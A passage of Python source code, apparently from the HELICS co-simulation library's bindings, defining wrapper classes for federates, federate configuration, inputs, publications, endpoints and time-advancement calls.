def send_data(self, data: Union[bytes, HelicsMessage], destination: str = None, time=None):
if type(data) == HelicsMessage:
helicsEndpointSendMessage(self, data)
elif time is None:
helicsEndpointSendBytesTo(self, data, destination)
else:
helicsEndpointSendBytesToAt(self, data, destination, time)
class _FederateInfoFlagAccessor(_HelicsCHandle):
def __getitem__(self, index):
raise AttributeError("Unable to get {index}".format(index=index))
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetFlagIndex(index)
else:
try:
idx = HelicsFlag(index)
except Exception as _:
idx = HelicsFederateFlag(index)
return helicsFederateInfoSetFlagOption(self, idx, value)
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class _FederateInfoPropertyAccessor(_HelicsCHandle):
def __getitem__(self, index):
raise AttributeError("Unable to get {index}".format(index=index))
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetPropertyIndex(index)
else:
idx = HelicsProperty(index)
if "TIME_" in idx.name:
return helicsFederateInfoSetTimeProperty(self, idx, value)
elif "INT_" in idx.name:
return helicsFederateInfoSetIntegerProperty(self, index, value)
def __repr__(self):
lst = []
for p in HelicsProperty:
lst.append("'{}' = {}".format(p.name, self[p]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsFederateInfo(_HelicsCHandle):
def __init__(self, handle):
# Python2 compatible super
super(HelicsFederateInfo, self).__init__(handle)
self.property = _FederateInfoPropertyAccessor(self.handle, cleanup=False)
self.flag = _FederateInfoFlagAccessor(self.handle, cleanup=False)
def __repr__(self):
return """<helics.{class_name}() at {id}>""".format(
class_name=self.__class__.__name__,
id=hex(id(self)),
)
@property
def core_name(self):
raise AttributeError("Unreadable attribute `core_name`")
@core_name.setter
def core_name(self, core_name: str):
helicsFederateInfoSetCoreName(self, core_name)
@property
def separator(self):
raise AttributeError("Unreadable attribute `separator`")
@separator.setter
def separator(self, separator: str):
"""
Specify a separator to use for naming separation between the federate name and the interface name.
`self.separator = '.'` will result in future registrations of local endpoints such as `"fedName.endpoint"`.
`self.separator = '/'` will result in `"fedName/endpoint"`.
The default is `'/'`.
Any character can be used though many will not make that much sense.
This call is not thread safe and should be called before any local interfaces are created otherwise it may not be possible to retrieve them without using the full name.
Recommended: ['/', '.', ':', '-', '_']
"""
helicsFederateInfoSetSeparator(self, separator)
@property
def core_init(self):
raise AttributeError("Unreadable attribute `core_init`")
@core_init.setter
def core_init(self, core_init: str):
"""
Set the core init string to use in the FederateInfo.
**`core_init`**: core init string to use.
"""
helicsFederateInfoSetCoreInitString(self, core_init)
@property
def broker_init(self):
raise AttributeError("Unreadable attribute `broker_init`")
@broker_init.setter
def broker_init(self, broker_init: str):
"""Set a string for the broker initialization in command line argument format."""
helicsFederateInfoSetBrokerInitString(self, broker_init)
@property
def core_type(self):
raise AttributeError("Unreadable attribute `core_type`")
@core_type.setter
def core_type(self, core_type):
"""
Set the core type with the core type.
**`coretype`**: A core type.
"""
if type(core_type) == str:
helicsFederateInfoSetCoreTypeFromString(self, core_type)
else:
helicsFederateInfoSetCoreType(self, HelicsCoreType(core_type))
@property
def broker(self):
raise AttributeError("Unreadable attribute `broker`.")
@broker.setter
def broker(self, broker: str):
"""
Set the broker to connect with.
**`broker`**: a string with the broker connection information or name.
"""
helicsFederateInfoSetBroker(self, broker)
@property
def broker_key(self):
raise AttributeError("Unreadable attribute `broker_key`.")
@broker_key.setter
def broker_key(self, broker_key):
"""Set the broker name to use.
**`broker_key`**: a string with the broker name information
"""
helicsFederateInfoSetBrokerKey(self, broker_key)
@property
def local_port(self):
raise AttributeError("Unreadable attribute `local_port`.")
@local_port.setter
def local_port(self, broker_port: int):
helicsFederateInfoSetLocalPort(self, broker_port)
@property
def broker_port(self):
raise AttributeError("Unreadable attribute `broker_port`.")
@broker_port.setter
def broker_port(self, broker_port: int):
helicsFederateInfoSetBrokerPort(self, broker_port)
class _PublicationOptionAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsPublicationGetOption(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsPublicationSetOption(self, idx, value)
def __repr__(self):
lst = []
for o in HelicsHandleOption:
lst.append("'{}' = {}".format(o.name, self[o]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class _FederateFlagAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetFlagIndex(index)
else:
try:
idx = HelicsFlag(index)
except Exception as _:
idx = HelicsFederateFlag(index)
return helicsFederateGetFlagOption(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetFlagIndex(index)
else:
try:
idx = HelicsFlag(index)
except Exception as _:
idx = HelicsFederateFlag(index)
return helicsFederateSetFlagOption(self, idx, value)
def __repr__(self):
lst = []
for f in HelicsFlag:
try:
lst.append("'{}' = {}".format(f.name, self[f]))
except Exception as _:
pass
for f in HelicsFederateFlag:
try:
lst.append("'{}' = {}".format(f.name, self[f]))
except Exception as _:
pass
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class _FederatePropertyAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetPropertyIndex(index)
else:
idx = HelicsProperty(index)
if "TIME_" in idx.name:
return helicsFederateGetTimeProperty(self, idx)
elif "INT_" in idx.name:
return helicsFederateGetIntegerProperty(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetPropertyIndex(index)
else:
idx = HelicsProperty(index)
if "TIME_" in idx.name:
return helicsFederateSetTimeProperty(self, idx, value)
elif "INT_" in idx.name:
return helicsFederateSetIntegerProperty(self, index, value)
def __repr__(self):
lst = []
for p in HelicsProperty:
lst.append("'{}' = {}".format(p.name, self[p]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsFederate(_HelicsCHandle):
def __init__(self, handle):
# Python2 compatible super
super(HelicsFederate, self).__init__(handle)
self._exec_async_iterate = False
self.property = _FederatePropertyAccessor(self.handle, cleanup=False)
self.flag = _FederateFlagAccessor(self.handle, cleanup=False)
self._separator = "/"
self.publications = {}
self.subscriptions = {}
self.endpoints = {}
self.filters = {}
def __repr__(self):
name = self.name
state = str(self.state)
current_time = self.current_time
n_publications = self.n_publications
n_endpoints = self.n_endpoints
n_filters = self.n_filters
n_subscriptions = self.n_inputs
n_pending_messages = self.n_pending_messages
return """<helics.{class_name}(name = "{name}", state = {state}, current_time = {current_time}, n_publications = {n_publications}, n_subscriptions = {n_subscriptions}, n_endpoints = {n_endpoints}, n_filters = {n_filters}, n_pending_messages = {n_pending_messages}) at {id}>""".format(
class_name=self.__class__.__name__,
name=name,
state=state,
current_time=current_time,
n_publications=n_publications,
n_endpoints=n_endpoints,
n_filters=n_filters,
n_subscriptions=n_subscriptions,
n_pending_messages=n_pending_messages,
id=hex(id(self)),
)
@property
def name(self) -> str:
return helicsFederateGetName(self)
@property
def state(self) -> HelicsFederateState:
return helicsFederateGetState(self)
@property
def current_time(self) -> HelicsTime:
return helicsFederateGetCurrentTime(self)
@property
def core(self) -> HelicsCore:
return helicsFederateGetCore(self)
@property
def n_publications(self) -> int:
return helicsFederateGetPublicationCount(self)
@property
def n_endpoints(self) -> int:
return helicsFederateGetEndpointCount(self)
@property
def n_filters(self) -> int:
return helicsFederateGetFilterCount(self)
@property
def n_inputs(self) -> int:
return helicsFederateGetInputCount(self)
@property
def n_pending_messages(self):
"""Returns the number of pending receives for all endpoints."""
return helicsFederatePendingMessageCount(self)
@property
def separator(self):
return self._separator
@separator.setter
def separator(self, separator: str):
"""
Specify a separator to use for naming separation between the federate name and the interface name.
`self.separator = '.'` will result in future registrations of local endpoints such as `"fedName.endpoint"`.
`self.separator = '/'` will result in `"fedName/endpoint"`.
The default is `'/'`.
Any character can be used though many will not make that much sense.
This call is not thread safe and should be called before any local interfaces are created otherwise it may not be possible to retrieve them without using the full name.
Recommended: ['/', '.', ':', '-', '_']
**Parameters**
- **separator**: str to use as separator.
"""
helicsFederateSetSeparator(self, separator)
self._separator = separator
def register_interfaces(self, config):
"""
Register a set of interfaces defined in a file.
Call is only valid in startup mode
**Parameters**
- **`configString`**: the location of the file or config String to load to generate the interfaces
"""
helicsFederateRegisterInterfaces(self, config)
def enter_initializing_mode(self):
"""
Enter the initialization mode after all interfaces have been defined.
The call will block until all federates have entered initialization mode.
"""
helicsFederateEnterInitializingMode(self)
def enter_initializing_mode_async(self):
"""
Enter the initialization mode after all interfaces have been defined.
The call will not block but a call to `enter_initializing_mode_complete` should be made to complete the call sequence.
"""
helicsFederateEnterInitializingModeAsync(self)
def is_async_operation_completed(self):
"""
Called after one of the async calls and will indicate true if an async operation has completed.
Only call from the same thread as the one that called the initial async call and will return false if called when no aysnc operation is in flight
"""
return helicsFederateIsAsyncOperationCompleted(self)
def enter_initializing_mode_complete(self):
"""
Second part of the async process for entering initializationState call after a call to `enter_initializing_mode_async` if call any other time it will throw an `InvalidFunctionCall` exception
"""
helicsFederateEnterInitializingModeComplete(self)
def enter_executing_mode(self, iterate: HelicsIterationRequest = HelicsIterationRequest.NO_ITERATION):
"""
Enter the normal execution mode.
Call will block until all federates have entered this mode.
**Parameters**
- **`iterate`**: An optional flag indicating the desired iteration mode.
"""
iterate = HelicsIterationRequest(iterate)
if iterate == HelicsIterationRequest.NO_ITERATION:
helicsFederateEnterExecutingMode(self)
out_iterate = HelicsIterationResult.NEXT_STEP
else:
out_iterate = helicsFederateEnterExecutingModeIterative(self, iterate)
return out_iterate
def enter_executing_mode_async(self, iterate: HelicsIterationRequest = HelicsIterationRequest.NO_ITERATION):
"""
Enter the normal execution mode.
Call will return immediately but `enter_executing_mode_complete` should be called to complete the operation.
**Parameters**
- **`iterate`**: An optional flag indicating the desired iteration mode.
"""
iterate = HelicsIterationRequest(iterate)
if iterate == HelicsIterationRequest.NO_ITERATION:
helicsFederateEnterExecutingModeAsync(self)
self._exec_async_iterate = False
else:
helicsFederateEnterExecutingModeIterativeAsync(self, iterate)
self._exec_async_iterate = True
def enter_executing_mode_complete(self):
"""
Complete the async call for entering Execution state.
Call will not block but will return quickly.
The `enter_initializing_mode_complete` must be called before doing other operations.
"""
out_iterate = HelicsIterationResult.NEXT_STEP
if self._exec_async_iterate:
out_iterate = helicsFederateEnterExecutingModeIterativeComplete(self)
else:
helicsFederateEnterExecutingModeComplete(self)
return out_iterate
def disconnect(self):
"""
Terminate the simulation.
Call is will block until the disconnect has been acknowledged, no commands that interact with the core may be called after this function function.
"""
helicsFederateDisconnect(self)
def disconnect_async(self):
"""
Terminate the simulation in a non-blocking call.
`self.disconnect_complete()` must be called after this call to complete the disconnect procedure.
"""
helicsFederateDisconnectAsync(self)
def disconnect_complete(self):
"""
Complete the asynchronous terminate pair.
"""
helicsFederateDisconnectComplete(self)
def finalize(self):
"""
Terminate the simulation.
Call is will block until the finalize has been acknowledged, no commands that interact with the core may be called after this function function.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsFederate.disconnect` function instead.")
helicsFederateFinalize(self)
def finalize_async(self):
"""
Terminate the simulation in a non-blocking call.
`self.finalize_complete()` must be called after this call to complete the finalize procedure.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsFederate.disconnect_async` function instead.")
helicsFederateFinalizeAsync(self)
def finalize_complete(self):
"""
Complete the asynchronous terminate pair.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsFederate.disconnect_complete` function instead.")
helicsFederateFinalizeComplete(self)
def request_time(self, time: HelicsTime) -> HelicsTime:
"""
**Parameters**
- **`time`**: the next requested time step.
Returns: The granted time step.
"""
return helicsFederateRequestTime(self, time)
def request_next_step(self) -> HelicsTime:
"""
Request a time advancement to the next allowed time.
Returns: The granted time step.
"""
return helicsFederateRequestNextStep(self)
def request_time_advance(self, time_delta: HelicsTime) -> HelicsTime:
"""
Request a time advancement to the next allowed time.
**Parameters**
- **`timeDelta`**: The amount of time requested to advance.
Returns: The granted time step.
"""
return helicsFederateRequestTimeAdvance(self, time_delta)
def request_time_iterative(self, time: float, iterate: HelicsIterationRequest) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Request a time advancement.
**Parameters**
- **`time`**: the next requested time step.
- **`iterate`**: a requested iteration mode.
Returns: The granted time step in a structure containing a return time and an iteration_result.
"""
grantedTime, status = helicsFederateRequestTimeIterative(self, time, iterate)
return grantedTime, status
def request_time_async(self, time: HelicsTime):
"""
Request a time advancement and return immediately for asynchronous function.
`self.request_time_complete()` should be called to finish the operation and get the result.
**Parameters**
- **`time`**: the next requested time step
"""
helicsFederateRequestTimeAsync(self, time)
def request_time_iterative_async(self, time: float, iterate: HelicsIterationRequest):
"""
Request a time advancement with iterative call and return for asynchronous function.
`self.request_time_iterative_complete()` should be called to finish the operation and get the result.
**Parameters**
- **`time`**: the next requested time step.
- **`iterate`**: a requested iteration level (none, require, optional).
"""
helicsFederateRequestTimeIterativeAsync(self, time, iterate)
def request_time_complete(self) -> HelicsTime:
"""
Request a time advancement.
Returns: the granted time step.
"""
return helicsFederateRequestTimeComplete(self)
def request_time_iterative_complete(self) -> Tuple[HelicsTime, HelicsIterationResult]:
"""
Finalize the time advancement request.
Returns: the granted time step and iteration result.
"""
granted_time, status = helicsFederateRequestTimeIterativeComplete(self)
return granted_time, status
def query(self, target: str, query: str) -> JSONType:
"""
Make a query of the federate.
This call is blocking until the value is returned which make take some time depending on the size of the federation and the specific string being queried.
**Parameters**
- **`target`**: the target of the query can be "federation", "federate", "broker", "core", or a specific name of a federate, core, or broker.
- **`query`**: a string with the query see other documentation for specific properties to query, can be defined by the federate.
Returns: a string with the value requested.
this is either going to be a vector of strings value or a JSON string stored in the first element of the vector. The string "#invalid" is returned if the query was not valid.
"""
q = helicsCreateQuery(target, query)
result = helicsQueryExecute(q, self)
helicsQueryFree(q)
return result
def register_filter(self, kind: HelicsFilterType, filter_name: str) -> HelicsFilter:
"""
Define a filter interface.
A filter will modify messages coming from or going to target endpoints.
**Parameters**
- **`kind`**: the type of the filter to register.
- **`filter_name`**: the name of the filter.
"""
filter = helicsFederateRegisterFilter(self, kind, filter_name)
self.filters[filter.name] = filter
return filter
def register_cloning_filter(self, delivery_endpoint: str) -> HelicsCloningFilter:
"""
Create a `HelicsCloningFilter` on the specified federate.
Cloning filters copy a message and send it to multiple locations source and destination can be added through other functions.
**Parameters**
- **`delivery_endpoint`**: the specified endpoint to deliver the message.
Returns: A `HelicsCloningFilter` object.
"""
filter = helicsFederateRegisterCloningFilter(self, delivery_endpoint)
self.filters[filter.name] = filter
return filter
def register_global_filter(self, kind: HelicsFilterType, filter_name: str) -> HelicsFilter:
"""
Define a filter interface.
A filter will modify messages coming from or going to target endpoints.
**Parameters**
- **`kind`**: the type of the filter to register.
- **`filter_name`**: the name of the filter.
"""
filter = helicsFederateRegisterGlobalFilter(self, kind, filter_name)
self.filters[filter.name] = filter
return filter
def register_global_cloning_filter(self, delivery_endpoint: str) -> HelicsCloningFilter:
"""
Create a cloning Filter on the specified federate
Cloning filters copy a message and send it to multiple locations source and destination can be added through other functions.
**Parameters**
- **`delivery_endpoint`**: the specified endpoint to deliver the message.
Returns: A CloningFilter object.
"""
filter = helicsFederateRegisterGlobalCloningFilter(self, delivery_endpoint)
self.filters[filter.name] = filter
return filter
def get_filter_by_name(self, filter_name):
"""
Get the id of a source filter from the name of the endpoint.
**Parameters**
- **`filter_name`**: the name of the filter.
Returns: a reference to a filter object which could be invalid if `filter_name` is not valid.
"""
return helicsFederateGetFilter(self, filter_name)
def get_filter_by_index(self, filter_index):
"""
Get a filter by index.
**Parameters**
- **`index`**: the index of a filter.
Returns: A reference to a filter object which could be invalid if `filter_name` is not valid.
"""
return helicsFederateGetFilterByIndex(self, filter_index)
def set_global(self, name: str, value: str):
"""
Set a federation global value.
This overwrites any previous value for this name.
**Parameters**
- **`name`**: the name of the global to set.
- **`value`**: the value of the global.
"""
helicsFederateSetGlobal(self, name, value)
def add_dependency(self, federate_name):
"""
Add a dependency for this federate.
Adds an additional internal time dependency for the federate.
**Parameters**
- **`fed_name`**: the name of the federate to add a dependency on.
"""
helicsFederateAddDependency(self, federate_name)
def local_error(self, error_code: int, error_string: str):
"""
Generate a local federate error.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsFederateLocalError(self, error_code, error_string)
def global_error(self, error_code: int, error_string: str):
"""
Generate a global error to terminate the federation.
**Parameters**
- **`error_code`**: an error code to give to the error.
- **`error_string`**: a string message associated with the error.
"""
helicsFederateGlobalError(self, error_code, error_string)
def log_message(self, message: str, level: HelicsLogLevel):
"""Log an message."""
if level == logging.ERROR:
helicsFederateLogErrorMessage(self, message)
elif level == logging.WARN:
helicsFederateLogWarningMessage(self, message)
elif level == logging.INFO:
helicsFederateLogInfoMessage(self, message)
elif level == logging.DEBUG:
helicsFederateLogDebugMessage(self, message)
else:
helicsFederateLogLevelMessage(self, HelicsLogLevel(level), message)
class _InputOptionAccessor(_HelicsCHandle):
def __getitem__(self, index):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsInputGetOption(self, idx)
def __setitem__(self, index, value):
if type(index) == str:
idx = helicsGetOptionIndex(index)
else:
idx = HelicsHandleOption(index)
return helicsInputSetOption(self, idx, value)
def __repr__(self):
lst = []
for o in HelicsHandleOption:
lst.append("'{}' = {}".format(o.name, self[o]))
return "<{{ {} }}>".format(", ".join(lst))
def __delitem__(self, index):
raise NotImplementedError("Cannot delete index: {}".format(index))
class HelicsInput(_HelicsCHandle):
def __init__(self, handle):
super(HelicsInput, self).__init__(handle, cleanup=False)
self.option = _InputOptionAccessor(self.handle, cleanup=False)
def __repr__(self):
name = self.name
units = self.units
injection_units = self.injection_units
publication_type = self.publication_type
type = self.type
target = self.target
info = self.info
return """<helics.{class_name}(name = "{name}", units = "{units}", injection_units = "{injection_units}", publication_type = "{publication_type}", type = "{type}", target = "{target}", info = "{info}") at {id}>""".format(
class_name=self.__class__.__name__,
name=name,
units=units,
injection_units=injection_units,
publication_type=publication_type,
type=type,
target=target,
info=info,
id=hex(id(self)),
)
def is_valid(self) -> bool:
"""Check if the input is valid."""
return helicsInputIsValid(self)
def add_target(self, target: str):
"""Add a publication target to the input."""
helicsInputAddTarget(self, target)
def set_default(self, data: Union[bytes, str, int, bool, float, complex, List[float]]):
"""
Set the default value as a raw data
Set the default value as a string
Set the default value as an integer
Set the default value as a bool
Set the default value as a double
Set the default value as a vector of doubles
"""
if isinstance(data, bytes):
helicsInputSetDefaultBytes(self, data)
elif isinstance(data, str):
helicsInputSetDefaultString(self, data)
elif isinstance(data, int):
helicsInputSetDefaultInteger(self, data)
elif isinstance(data, bool):
helicsInputSetDefaultBoolean(self, data)
elif isinstance(data, float):
helicsInputSetDefaultDouble(self, data)
elif isinstance(data, complex):
helicsInputSetDefaultComplex(self, data.real, data.imag)
elif isinstance(data, list):
helicsInputSetDefaultVector(self, data)
else:
raise NotImplementedError("Unknown type `{}`".format(type(data)))
@property
def value(self) -> Union[bytes, str, int, bool, float, complex, Tuple, List[float]]:
if self.publication_type == "bytes":
return self.bytes
elif self.publication_type == "string":
return self.string
elif self.publication_type == "integer":
return self.integer
elif self.publication_type == "boolean":
return self.boolean
elif self.publication_type == "double":
return self.double
elif self.publication_type == "complex":
return self.complex
elif self.publication_type == "vector":
return self.vector
elif self.publication_type == "named_point":
return self.named_point
else:
warnings.warn("Unknown publication type `{}`. Defaulting to string.".format(self.publication_type))
return self.string
@property
def bytes(self) -> bytes:
"""Get a raw value as a character vector."""
return helicsInputGetBytes(self)
@property
def string(self) -> str:
"""Get the current value as a string."""
return helicsInputGetString(self)
@property
def named_point(self) -> Tuple[str, float]:
"""Get the current value as a named point."""
return helicsInputGetNamedPoint(self)
@property
def integer(self) -> int:
"""Get the current value as a 64 bit integer."""
return helicsInputGetInteger(self)
@property
def boolean(self) -> bool:
"""Get the value as a boolean."""
return helicsInputGetBoolean(self)
@property
def double(self) -> float:
"""Get the value as a double."""
return helicsInputGetDouble(self)
@property
def complex(self) -> complex:
"""Get the value as a complex number."""
with warnings.catch_warnings():
warnings.simplefilter("ignore")
r, i = helicsInputGetComplex(self)
return complex(r, i)
@property
def vector(self) -> List[float]:
"""get the current value as a vector of doubles."""
return helicsInputGetVector(self)
def is_updated(self) -> bool:
"""Check if an input is updated."""
return helicsInputIsUpdated(self)
def get_last_update_time(self) -> HelicsTime:
"""Get the last time an input was updated."""
return helicsInputLastUpdateTime(self)
def clear_update(self):
"""Clear the updated flag."""
helicsInputClearUpdate(self)
@property
def key(self) -> str:
"""
Get the name/key for the input
the name is the local name if given, key is the full key name.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsInput.name` attribute instead.")
return helicsInputGetKey(self)
@property
def name(self) -> str:
"""
Get the name/key for the input
the name is the local name if given, key is the full key name.
"""
return helicsInputGetName(self)
@property
def units(self) -> str:
"""Get the units associated with a input."""
return helicsInputGetExtractionUnits(self)
@property
def injection_units(self) -> str:
"""Get the units associated with an inputs publication."""
return helicsInputGetInjectionUnits(self)
@property
def publication_type(self) -> str:
"""Get the units associated with a publication of an input."""
return helicsInputGetPublicationType(self)
@property
def type(self) -> str:
"""Get the type of the input."""
return helicsInputGetType(self)
@property
def target(self) -> str:
"""Get an associated target."""
return helicsSubscriptionGetTarget(self)
@property
def info(self) -> str:
"""Get the interface information field of the filter."""
return helicsInputGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the publication."""
helicsInputSetInfo(self, info)
class HelicsPublication(_HelicsCHandle):
def __init__(self, handle):
super(HelicsPublication, self).__init__(handle, cleanup=False)
self.option = _PublicationOptionAccessor(self.handle, cleanup=False)
def __repr__(self):
name = self.name
type = self.type
info = self.info
units = self.units
return """<helics.{class_name}(name = "{name}", type = "{type}", units = "{units}", info = "{info}") at {id}>""".format(
class_name=self.__class__.__name__, name=name, type=type, units=units, info=info, id=hex(id(self))
)
def is_valid(self) -> bool:
"""Check if the publication is valid."""
return helicsPublicationIsValid(self)
def publish(self, data: Union[bytes, str, int, complex, float, List[float], Tuple[str, float], bool]):
"""
publish raw bytes
publish a string
publish an int value
publish a double
publish a complex number
publish a vector of doubles
publish a named point with a string and double
publish a boolean value
"""
if isinstance(data, bytes):
helicsPublicationPublishBytes(self, data)
elif isinstance(data, str):
helicsPublicationPublishString(self, data)
elif isinstance(data, int):
helicsPublicationPublishInteger(self, data)
elif isinstance(data, float):
helicsPublicationPublishDouble(self, data)
elif isinstance(data, complex):
helicsPublicationPublishComplex(self, data.real, data.imag)
elif isinstance(data, list):
helicsPublicationPublishVector(self, data)
elif isinstance(data, tuple):
helicsPublicationPublishNamedPoint(self, data[0], data[1])
elif isinstance(data, bool):
helicsPublicationPublishBoolean(self, data)
else:
raise NotImplementedError("Unknown type `{}`".format(type(data)))
@property
def key(self) -> str:
"""
Get the key for the publication.
**DEPRECATED**
"""
warnings.warn("This function is deprecated. Use the `HelicsPublication.name` attribute instead.")
return helicsPublicationGetName(self)
@property
def name(self) -> str:
"""Get the key for the publication."""
return helicsPublicationGetName(self)
@property
def units(self) -> str:
"""Get the units of the publication."""
return helicsPublicationGetUnits(self)
@property
def type(self) -> str:
"""Get the type for the publication."""
return helicsPublicationGetType(self)
@property
def info(self) -> str:
"""Get the interface information field of the publication."""
return helicsPublicationGetInfo(self)
@info.setter
def info(self, info: str):
"""Set the interface information field of the publication."""
helicsPublicationSetInfo(self, info)
class HelicsValueFederate(HelicsFederate):
def __init__(self, handle):
super(HelicsValueFederate, self).__init__(handle)
for i in range(0, self.n_publications):
pub = self.get_publication_by_index(i)
self.publications[pub.name] = pub
for i in range(0, self.n_inputs):
sub = self.get_subscription_by_index(i)
self.subscriptions[sub.target] = sub
def register_publication(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsPublication:
"""
Register a publication.
Call is only valid in startup mode.
**Parameters**
- **`name`**: the name of the publication.
- **`kind`**: the type of the publication.
- **`units`**: a string defining the units of the publication [optional]
Returns: a publication id object for use as an identifier
"""
if type(kind) == str:
pub = helicsFederateRegisterTypePublication(self, name, kind, units)
else:
pub = helicsFederateRegisterPublication(self, name, HelicsDataType(kind), units)
self.publications[pub.name] = pub
return pub
def register_global_publication(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsPublication:
"""
Register a publication
Call is only valid in startup mode
**Parameters**
- **`name`**: the name of the publication
- **`kind`**: the type of the publication
- **`units`**: a string defining the units of the publication [optional]
Returns: a publication object for use as an identifier
"""
if type(kind) == str:
pub = helicsFederateRegisterGlobalTypePublication(self, name, kind, units)
else:
pub = helicsFederateRegisterGlobalPublication(self, name, HelicsDataType(kind), units)
self.publications[pub.name] = pub
return pub
def register_from_publication_json(self, data: Union[dict, str]):
"""
Register publications from a JSON output file or string.
Generates interface based on the data contained in a JSON file or string.
"""
if type(data) == str:
try:
with open(data) as f:
data = json.load(f)
except Exception:
data = json.loads(data)
else:
data = json.dumps(data)
helicsFederateRegisterFromPublicationJSON(self, data)
for i in range(0, self.n_publications):
pub = self.get_publication_by_index(i)
self.publications[pub.name] = pub
def get_publication_by_name(self, name: str) -> HelicsPublication:
"""Get publication by name."""
return helicsFederateGetPublication(self, name)
def get_publication_by_index(self, index: int) -> HelicsPublication:
"""
Get a publication by index.
**Parameters**
- **`index`**: a 0 based index of the publication to retrieve
Returns: a Publication object
"""
return helicsFederateGetPublicationByIndex(self, index)
def register_subscription(self, name: str, units: str = "") -> HelicsInput:
sub = helicsFederateRegisterSubscription(self, name, units)
self.subscriptions[sub.target] = sub
return sub
def register_input(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsInput:
"""
Register an input.
Call is only valid in startup mode.
**Parameters**
- **`name`**: the name of the input
- **`kind`**: the type of input to register
- **`units`**: a string defining the units of the input [optional]
Returns: an input id object for use as an identifier
"""
if type(kind) == str:
ipt = helicsFederateRegisterTypeInput(self, name, kind, units)
else:
ipt = helicsFederateRegisterTypeInput(self, name, HelicsDataType(kind), units)
self.subscriptions[ipt.target] = ipt
return ipt
def register_global_input(self, name: str, kind: Union[str, HelicsDataType], units: str = "") -> HelicsInput:
"""
Register an input.
Call is only valid in startup mode.
**Parameters**
- **`name`**: the name of the input
- **`kind`**: a string defining the type of the input
- **`units`**: a string defining the units of the input [optional]
Returns: an input object for use as an identifier.
"""
if type(kind) == str:
ipt = helicsFederateRegisterGlobalTypeInput(self, name, kind, units)
else:
ipt = helicsFederateRegisterGlobalTypeInput(self, name, HelicsDataType(kind), units)
self.subscriptions[ipt.target] = ipt
return ipt
def get_subscription_by_name(self, name: str) -> HelicsInput:
"""Get an input by index."""
return helicsFederateGetInput(self, name)
def get_subscription_by_index(self, index: int) -> HelicsInput:
"""Get a subscription by index."""
return helicsFederateGetInputByIndex(self, index)
@property
def n_subscriptions(self) -> int:
"""Get the number of inputs in this federate."""
return helicsFederateGetInputCount(self)
@property
def n_publications(self) -> int:
"""Get the number of publications in this federate."""
return helicsFederateGetPublicationCount(self)
def clear_updates(self):
"""Clear all the update flags from all federate inputs."""
helicsFederateClearUpdates(self)
def publish_json(self, data: Union[dict, str]):
"""Publish data contained in a JSON file."""
if type(data) == str:
try:
with open(data) as f:
data = json.load(f)
except Exception:
data = json.loads(data)
else:
data = json.dumps(data)
helicsFederatePublishJSON(self, data)
class HelicsMessageFederate(HelicsFederate):
def __init__(self, handle):
super(HelicsMessageFederate, self).__init__(handle)
for i in range(0, self.n_endpoints):
end = self.get_endpoint_by_index(i)
self.endpoints[end.name] = end
def register_endpoint(self, name: str, kind: str = "") -> HelicsEndpoint:
"""
Register an endpoint.
Call is only valid in startup mode
- **`name`**: the name of the endpoint
- **`kind`**: the defined type of the interface for endpoint checking if requested
Returns: an Endpoint Object
"""
ep = helicsFederateRegisterEndpoint(self, name, kind)
self.endpoints[ep.name] = ep
return ep
def register_global_endpoint(self, name: str, kind: str = "") -> HelicsEndpoint:
"""
Register an endpoint directly without prepending the federate name.
- **`name`**: the name of the endpoint
- **`kind`**: the defined type of the interface for endpoint checking if requested
Returns: an Endpoint Object
"""
ep = helicsFederateRegisterGlobalEndpoint(self, name, kind)
self.endpoints[ep.name] = ep
return ep
def get_endpoint_by_name(self, name: str) -> HelicsEndpoint:
"""
Get an Endpoint from its name.
**Parameters**
- **`name`**: the name of the endpoint to retrieve.
Returns: an Endpoint
"""
return helicsFederateGetEndpoint(self, name)
def get_endpoint_by_index(self, index: int) -> HelicsEndpoint:
"""
Get an Endpoint from an index.
**Parameters**
- **`index`**: the index of the endpoint to retrieve index is 0 based
Return an Endpoint
"""
return helicsFederateGetEndpointByIndex(self, index)
def has_message(self) -> bool:
"""Checks if federate has any messages."""
return helicsFederateHasMessage(self)
def get_message(self) -> HelicsMessage:
"""Get a packet for any endpoints in the federate."""
return helicsFederateGetMessage(self)
def create_message(self) -> HelicsMessage:
"""Create a message object."""
return helicsFederateCreateMessage(self)
class HelicsCombinationFederate(HelicsValueFederate, HelicsMessageFederate):
pass
class HelicsException(Exception):
pass
def cstring(s: str) -> str:
# Convert python string to cstring
return ffi.new("char[]", s.encode())
def cdouble(d: float) -> float:
# Convert python float to cfloat
return d
def cchar(c: str) -> bytes:
# Convert python str to cchar
return c.encode()
def loadSym(s):
return getattr(lib, s)
def helicsGetVersion() -> str:
"""
